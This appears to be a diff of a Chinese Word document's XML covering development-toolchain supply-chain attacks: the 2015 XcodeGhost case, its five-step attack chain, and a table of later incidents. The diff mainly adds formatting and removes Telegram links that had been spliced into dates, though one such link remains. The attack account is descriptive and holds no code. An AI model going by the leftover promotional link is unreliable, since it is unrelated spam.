       <w:r>
         <w:rPr>
@@ -2498,6 +2459,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2507,6 +2471,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2534,6 +2503,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2568,20 +2542,17 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>https://t.me/pjx712</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
+        <w:t>https://t.me/one00190</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc242275483"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc242453619"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2589,18 +2560,54 @@
         <w:lastRenderedPageBreak/>
         <w:t>二、开发工具链污染</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc242453620"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2.1 XcodeGhost</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">iOS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>供应链攻击的里程碑</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc242275484"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>2.1 XcodeGhost</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>时间</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2612,23 +2619,39 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">iOS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>供应链攻击的里程碑</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">2015 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>年</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 9 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>月</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>时间</w:t>
+        <w:t>影响</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2640,46 +2663,39 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">15 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>年</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 9 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>月</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">39 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>款</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> App Store </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>应用，包括微信、网易云音乐、滴滴出行等，影响数亿用户</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t>影响</w:t>
+        <w:t>攻击链</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2687,17 +2703,230 @@
         </w:rPr>
         <w:t>：</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">39 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>款</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>污染</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Xcode </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>安装包</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：攻击者在中国大陆的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CDN </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>上托管了修改版的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Xcode IDE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>（原版</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Xcode </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在中国下载速度慢）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>开发者下载并使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：大量</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> iOS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>开发者从非官方渠道下载了被污染的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Xcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>编译时注入恶意代码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：被污染的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Xcode </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在编译时自动注入恶意代码到所有编译的应用中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">4. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>应用上架</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> App Store</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：被污染的应用通过</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Apple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>审核，上架</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> App Store</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">5. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>用户下载安装</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：用户从</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2709,247 +2938,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>应用，包括微信、网易云音乐、滴滴出行等，影响数亿用户</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>攻击链</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>污染</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Xcode </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>安装包</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：攻击者在中国大陆的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CDN </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>上托管了修改版的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Xcode IDE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>（原版</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Xcode </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在中国下载速度慢）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>开发者下载并使用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：大量</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> iOS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>开发者从非官方渠道下载了被污染的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Xcode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>编译时注入恶意代码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：被污染的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Xcode </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在编译时自动注入恶意代码到所有编译的应用中</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">4. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>应用上架</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> App Store</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：被污染的应用通过</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Apple </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>审核，上架</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> App Store</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="280" w:hanging="280"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">5. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>用户下载安装</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：用户从</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> App Store </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>下载的应用已包含恶意代码</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2968,6 +2965,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3004,6 +3004,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3028,6 +3031,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3052,6 +3058,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3061,6 +3070,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3079,6 +3093,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3110,6 +3127,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3141,6 +3161,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3160,6 +3183,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3190,6 +3216,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3208,6 +3239,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3238,6 +3272,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3268,6 +3305,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3291,8 +3331,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc242275485"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc242453621"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3305,7 +3348,7 @@
         </w:rPr>
         <w:t>其他开发工具链攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -3327,6 +3370,12 @@
         <w:gridCol w:w="2294"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3421,6 +3470,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3457,37 +3512,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>-1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
+              <w:t>2020-10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3577,6 +3602,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3613,31 +3644,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>21-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>9</w:t>
+              <w:t>2021-09</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3713,6 +3720,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3749,31 +3762,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>23-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2023-03</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3835,6 +3824,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -3851,6 +3846,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Malicious Fastlane Plugin</w:t>
             </w:r>
           </w:p>
@@ -3871,31 +3867,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>24-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>1</w:t>
+              <w:t>2024-01</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3973,6 +3945,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3991,6 +3968,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4003,6 +3983,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
